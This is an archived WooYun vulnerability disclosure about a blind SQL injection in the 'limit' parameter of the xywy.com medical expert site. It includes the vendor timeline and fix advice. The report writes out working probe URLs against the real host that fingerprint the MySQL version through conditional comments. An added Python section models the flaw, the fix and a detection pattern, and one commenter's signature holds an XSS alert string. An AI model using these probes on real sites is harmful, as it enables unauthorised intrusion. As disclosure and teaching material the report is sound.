Vulnerability summary

Defect ID: wooyun-2013-038386

Title: Blind SQL injection in an interface of the Xunyiwenyao (寻医问药) expert site

Vendor: Xunyiwenyao (寻医问药)

Author: 猪猪侠

Submitted: 2013-09-27 21:19

Fixed: 2013-11-11 21:20

Published: 2013-11-11 21:20

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]


Vulnerability details

Disclosure status:

2013-09-27: Details sent to the vendor, awaiting vendor response
2013-09-28: Vendor confirmed; details disclosed to the vendor only
2013-10-08: Details disclosed to core white hats and experts in the relevant field
2013-10-18: Details disclosed to regular white hats
2013-10-28: Details disclosed to intern white hats
2013-11-11: Details disclosed to the public

Brief description:

An interface has a blind SQL injection vulnerability. Indirect exploitation still carries some risk, so I did not dig deeper.

Details:

#1 The limit parameter is not strictly filtered, which results in a blind injection vulnerability

http://z.xywy.com/index.php?a=interviewReply&limit=6/*!50056aaaa*/
False
http://z.xywy.com/index.php?a=interviewReply&limit=6/*!50086aaaa*/
False


A return of False shows that the database version is greater than 5.0.86
# Obtaining the version number: 5.0.93 returns normally
http://z.xywy.com/index.php?a=interviewReply&limit=6/*!50092aaaa*/
False
http://z.xywy.com/index.php?a=interviewReply&limit=6/*!50093aaaa*/
Normal response (the endpoint returns its usual JSON list of expert replies)

Proof of vulnerability:

# From the data returned for the parameters submitted above, blind injection can determine the database version to be 5.0.93

Fix:

Strictly filter parameters coming from the client.
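As an added illustration (not part of the original report), the Python below models why the probe works and what the fix looks like. MySQL parses the body of a `/*!NNNNN body*/` comment only when its own version, encoded as MMmmrr (5.0.86 is 50086), is greater than or equal to NNNNN; on any other version the whole construct is a plain comment. A `limit` value spliced into the query therefore becomes either `LIMIT 6` or the syntax error `LIMIT 6aaaa` depending on the server version, which is exactly the True/False oracle above. The query text, the `reply` table and the 100-row cap are assumptions; the real endpoint's SQL is not shown in the report.

```python
import re

# MySQL version-conditional comment: /*!NNNNN body*/ is parsed as `body` when the
# server version, encoded as MMmmrr (5.0.86 -> 50086), is >= NNNNN; otherwise the
# whole construct is an ordinary comment and disappears from the statement.
COND_COMMENT = re.compile(r"/\*!(\d{5})([^*]*)\*/")


def version_to_int(version: str) -> int:
    """'5.0.86' -> 50086, the encoding MySQL uses inside conditional comments."""
    major, minor, patch = (int(p) for p in version.split("."))
    return major * 10000 + minor * 100 + patch


def expand_conditional_comments(sql: str, server_version: str) -> str:
    """Model what a MySQL server of `server_version` actually parses from `sql`."""
    server = version_to_int(server_version)

    def keep_or_drop(match):
        return match.group(2) if server >= int(match.group(1)) else ""

    return COND_COMMENT.sub(keep_or_drop, sql)


def build_query_vulnerable(limit: str) -> str:
    """The flawed pattern: the raw `limit` request parameter is concatenated into
    SQL. (Assumed query text; the endpoint's real SQL is not in the report.)"""
    return "SELECT * FROM reply ORDER BY id DESC LIMIT " + limit


def parse_limit(limit: str, max_limit: int = 100) -> int:
    """Strict whitelist validation: only a plain decimal integer is accepted,
    so comment syntax can never reach the SQL text."""
    if not re.fullmatch(r"\d{1,3}", limit):
        raise ValueError("limit must be a plain integer")
    return min(int(limit), max_limit)


def build_query_safe(limit: str):
    """Validated value bound as a driver parameter instead of spliced into the
    string; returns (sql, params) as a DB-API call would take them."""
    return ("SELECT * FROM reply ORDER BY id DESC LIMIT %s", (parse_limit(limit),))


def is_version_probe(query_string: str) -> bool:
    """Detection rule for access logs: any /*!NNNNN ...*/ inside a query string
    is a strong signal of this probing technique and worth alerting on."""
    return COND_COMMENT.search(query_string) is not None
```

The same whitelist applies to any numeric pagination parameter; the detection regex is a starting point that should be correlated with the application's own error responses.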

Copyright notice: please credit the source when reposting: 猪猪侠@乌云


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2013-09-28 12:25

Vendor reply:

Thanks for submitting the bug

Latest status:

None yet


Vulnerability evaluation:

Comments

  1. 2013-10-28 14:45 | Rovegaby ( Passerby | Rank:8 Vulnerabilities:2 | Working hard)

    What is the principle here? What does it look like restored to SQL?

  2. 2013-11-11 22:00 | Mutoubug ( Regular white hat | Rank:112 Vulnerabilities:16 | <script>alert(wooyun);</script>)

    Please explain!

  3. 2013-11-14 14:05 | 肉肉 Certified white hat ( Regular white hat | Rank:112 Vulnerabilities:10 | 肉肉 is at Chaitin Tech, 肉肉 is at Chaitin Tech, 肉肉 is at Chai...)

    So the database version can be determined this way; I would also like to know the principle.

  4. 2014-02-19 10:45 | feng ( Regular white hat | Rank:664 Vulnerabilities:79 | Want to get a 6D)

    This vulnerability uses the way MySQL handles inline comments to perform the injection.